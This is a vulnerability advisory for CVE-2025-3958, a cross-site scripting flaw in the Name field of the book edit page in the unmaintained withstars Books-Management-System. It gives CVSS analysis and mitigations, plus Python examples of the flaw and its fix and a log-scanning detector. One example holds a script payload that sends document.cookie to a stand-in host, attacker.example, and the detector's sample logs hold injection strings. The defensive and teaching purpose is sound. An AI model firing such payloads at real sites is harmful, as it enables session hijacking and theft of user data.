
CVE-2025-3958: Cross Site Scripting in withstars Books-Management-System

Medium
Tags: Vulnerability, CVE-2025-3958, cve, cve-2025-3958
Published: Sun Apr 27 2025 (04/27/2025, 04:00:05 UTC)
Source: CVE
Vendor/Project: withstars
Product: Books-Management-System

Description

A vulnerability was found in withstars Books-Management-System 1.0. It has been classified as problematic. Affected is an unknown function of the file /book_edit_do.html of the component Book Edit Page. The manipulation of the argument Name leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well. This vulnerability only affects products that are no longer supported by the maintainer.

AI-Powered Analysis

AI analysis last updated: 06/24/2025, 22:04:34 UTC

Technical Analysis

CVE-2025-3958 is a cross-site scripting (XSS) vulnerability in version 1.0 of the withstars Books-Management-System, in the Book Edit Page component served at /book_edit_do.html. The value of the Name parameter reaches the rendered page without adequate validation or output encoding, so an attacker who can submit a crafted value gets script executed in the browser of whoever views the resulting page. VulDB classifies the issue as "problematic" and notes that other parameters may be affected as well. The affected version is no longer maintained, so no vendor fix is expected.

The CVSS v4.0 base score is 5.1 (Medium), with vector AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Read carefully, the vector says the flaw is reachable over the network with low attack complexity and no special preconditions, but it requires low privileges (PR:L, that is, an account able to reach the book edit function) and passive user interaction (UI:P, a victim merely viewing the affected page). The rated impact on the vulnerable system is low for integrity and none for confidentiality and availability, and no impact is recorded on subsequent systems (the SC/SI/SA metrics; CVSS v4.0 has no scope metric). The practical consequences of XSS, such as actions performed in the victim's session or theft of cookies that lack the HttpOnly flag, can exceed what the vector scores, so the rating is best treated as a floor rather than a ceiling.

A public exploit has been disclosed, although no exploitation in the wild had been observed at the time of writing. With no supported version to upgrade to, the exposure persists until the deployment is patched locally or retired.
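The injection point and its fix in miniature, as an added illustration rather than code from the Books-Management-System (the page does not show the project's language or template layout, so the handler below is a stand-in): a toy server-side handler for /book_edit_do.html that parses the submitted form and renders the book name, once by raw string interpolation and once through HTML entity encoding. The parameter name Name comes from the CVE record; the form field id, the table markup and the payload are constructed for the example.

```python
import html
from urllib.parse import parse_qs, urlencode

# Constructed payload: what an attacker would submit as the book name. It tries
# to exfiltrate document.cookie, which only works for cookies without HttpOnly.
XSS_PAYLOAD = '<script>location="https://attacker.example/?c="+document.cookie</script>'


def build_form_body(book_id: str, name: str) -> str:
    # application/x-www-form-urlencoded body as a browser (or curl) would send it.
    return urlencode({"id": book_id, "Name": name})


def render_book_row_vulnerable(name: str) -> str:
    # Raw interpolation: whatever was submitted as Name becomes live markup.
    return f'<tr><td class="book-name">{name}</td></tr>'


def render_book_row_fixed(name: str) -> str:
    # html.escape(quote=True) turns <, >, &, " and ' into entities, so the
    # browser displays the payload as text instead of executing it.
    return f'<tr><td class="book-name">{html.escape(name, quote=True)}</td></tr>'


def handle_book_edit(form_body: str, renderer) -> str:
    # Stand-in for the server side of /book_edit_do.html (assumed behaviour):
    # parse the form and re-render the row with the edited name.
    fields = parse_qs(form_body, keep_blank_values=True)
    name = fields.get("Name", [""])[0]
    return renderer(name)


# Defence in depth for an app that cannot be upgraded: a restrictive CSP so
# that even an encoding slip elsewhere cannot load scripts from other origins.
CSP_HEADER = (
    "Content-Security-Policy",
    "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'",
)


def contains_live_script(rendered: str) -> bool:
    # Used only to compare the two renderers: a raw <script tag means the
    # payload survived into the markup unencoded.
    return "<script" in rendered.lower()


if __name__ == "__main__":
    body = build_form_body("7", XSS_PAYLOAD)
    print("vulnerable:", handle_book_edit(body, render_book_row_vulnerable))
    print("fixed:     ", handle_book_edit(body, render_book_row_fixed))
```

The fixed renderer is the shape of the local patch an operator would apply when no vendor update exists: encode at the point of output, for Name and for every other user-controlled field on the page, preferably through the template engine's own escaping rather than hand-built string concatenation.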

Potential Impact

For European organizations using withstars Books-Management-System 1.0, this vulnerability poses a moderate risk, mainly to the integrity of user data and sessions. An attacker with an account that can reach the book edit function (the vector requires low privileges) could plant script that performs actions on behalf of other users, steals session cookies that are not marked HttpOnly, or redirects victims to further malicious content. This matters most for organizations that keep sensitive or proprietary information in the system, such as academic institutions, libraries, or publishing houses. The lack of vendor support means there is no patch to wait for, which lengthens the exposure window. If the system is integrated with other internal services or a single sign-on mechanism, the impact could extend beyond the Books-Management-System itself. The requirement for user interaction (in this case, a victim viewing the affected page) narrows the attack but does not remove it, especially in environments where phishing or social engineering is common. The medium severity indicates that while the threat is not critical, it should not be ignored, particularly in sectors subject to data protection regulation such as GDPR, where an incident could lead to data breaches, reputational damage, and regulatory penalties.

Mitigation Recommendations

Since the product is no longer supported and no official patch exists, organizations should plan to replace the deployment with a maintained Books-Management-System. If the application must stay in service in the meantime, apply the fix locally in the source: HTML-encode the Name value, and every other user-controlled field, at the point it is written into the page, preferably through the template engine's escaping rather than hand-built string concatenation, and verify the result with the disclosed payload. Mark session cookies HttpOnly and SameSite so that a residual script cannot read them or ride along on cross-site requests. Deploy a Content Security Policy that restricts script sources to the application's own origin to limit what injected markup can load. As a stopgap, configure a web application firewall with rules that inspect requests to /book_edit_do.html, including POST bodies, for script tags, event handlers and javascript: URLs in the Name parameter and other input fields, bearing in mind that such rules are bypassable and do not replace the code fix. Isolate the system in a segmented network zone with strict access controls, and monitor proxy and WAF logs for requests carrying encoded script fragments to the edit page. Conduct user awareness training on phishing and social engineering, since exploitation still needs a victim to view the affected page. Regularly review and audit all web-facing applications for similar vulnerabilities, prioritizing unsupported or legacy software.
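The log monitoring recommended above, as an added example that is not part of the original advisory or the project: a small detector that walks combined-format access-log lines, keeps requests to /book_edit_do.html, URL-decodes each query parameter (repeatedly, so double encoding does not hide a payload) and flags values that look like script injection. The log lines are constructed for the example; the regular expression is a heuristic indicator list, not a full WAF rule set. One practical caveat is built in: a standard access log records only the request line, so a payload submitted in a POST body only shows up if the reverse proxy or WAF logs bodies.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed log lines in combined format (assumption: a reverse proxy in front
# of the application logs the request line). Lines 2 and 3 carry injection
# attempts, line 3 in a parameter other than Name, as the CVE record warns.
SAMPLE_LOG = """\
203.0.113.7 - - [27/Apr/2025:10:12:01 +0000] "GET /book_edit_do.html?id=7&Name=Dune HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [27/Apr/2025:10:12:05 +0000] "GET /book_edit_do.html?id=7&Name=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 640 "-" "curl/8.0"
203.0.113.9 - - [27/Apr/2025:10:12:09 +0000] "GET /book_edit_do.html?id=8&Author=%253Cimg+src%253Dx+onerror%253Dalert(1)%253E HTTP/1.1" 200 640 "-" "curl/8.0"
198.51.100.4 - - [27/Apr/2025:10:13:00 +0000] "GET /index.html?q=%3Cscript%3E HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

TARGET_PATH = "/book_edit_do.html"

# Combined log format: client, identity, user, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+)'
)

# Heuristic indicators of script injection, applied after decoding:
# script tags, inline event handlers, javascript: URLs and common vector tags.
XSS_RE = re.compile(
    r'<\s*script|<\s*\w+[^>]*\bon\w+\s*=|javascript\s*:|<\s*(iframe|img|svg|object|embed)\b',
    re.IGNORECASE,
)


def fully_decode(value: str, rounds: int = 3) -> str:
    # parse_qsl already decoded once; keep decoding while it changes anything
    # so that %253C (double-encoded "<") is still caught.
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_xss_attempts(log_text: str) -> list:
    # Returns one record per parameter value that matches an indicator, with
    # the decoded payload so an analyst can see what was actually attempted.
    hits = []
    for line in log_text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue
        parts = urlsplit(match.group("target"))
        if parts.path != TARGET_PATH:
            continue
        for param, raw in parse_qsl(parts.query, keep_blank_values=True):
            payload = fully_decode(raw)
            if XSS_RE.search(payload):
                hits.append({
                    "ip": match.group("ip"),
                    "ts": match.group("ts"),
                    "param": param,
                    "payload": payload,
                })
    return hits


if __name__ == "__main__":
    for hit in find_xss_attempts(SAMPLE_LOG):
        print(f'{hit["ts"]} {hit["ip"]} param={hit["param"]} payload={hit["payload"]!r}')
```

The last sample line shows why the path filter matters for triage: the same fragment sent to a page that is not known to be vulnerable is still worth a look, but it belongs in a broader rule, not in the alert for this CVE.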


Technical Details

Data Version: 5.1
Assigner Short Name: VulDB
Date Reserved: 2025-04-26T07:03:21.742Z
CISA Enriched: true
CVSS Version: 4.0
State: PUBLISHED

Threat ID: 682d983dc4522896dcbef353

Added to database: 5/21/2025, 9:09:17 AM

Last enriched: 6/24/2025, 10:04:34 PM

Last updated: 7/26/2025, 5:19:42 PM

